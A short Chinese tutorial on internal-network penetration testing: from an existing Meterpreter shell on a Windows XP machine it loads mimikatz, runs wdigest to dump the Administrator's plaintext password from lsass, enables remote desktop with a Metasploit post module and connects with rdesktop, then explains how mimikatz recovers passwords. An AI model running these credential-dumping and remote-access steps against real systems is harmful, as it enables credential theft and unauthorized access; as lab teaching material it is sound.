内网渗透测试之(密码破解)
当我们获取系统的权限后,如果更高一步的获取权限呢,比如获取当前管理员的密码,开启远程桌面等。今天就让我们一起来看看吧。
PART 1/获取权限shell
如上,我们已经获取了系统的shell。当前受害系统为windows xp
PART 2/破解系统密码
载入mimikatz
load mimikatz
获取密码
wdigest
如图,当前Administrator的密码为bbskali.cn
PART 3/开启远程桌面
run post/windows/manage/enable_rdp
PART4/连接远程桌面
rdesktop 192.168.1.109 -u user -p password
PART5/拓展
mimikatz介绍
mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统! mimikatz是一个不错的密码破解工具:ku:
页:
[1]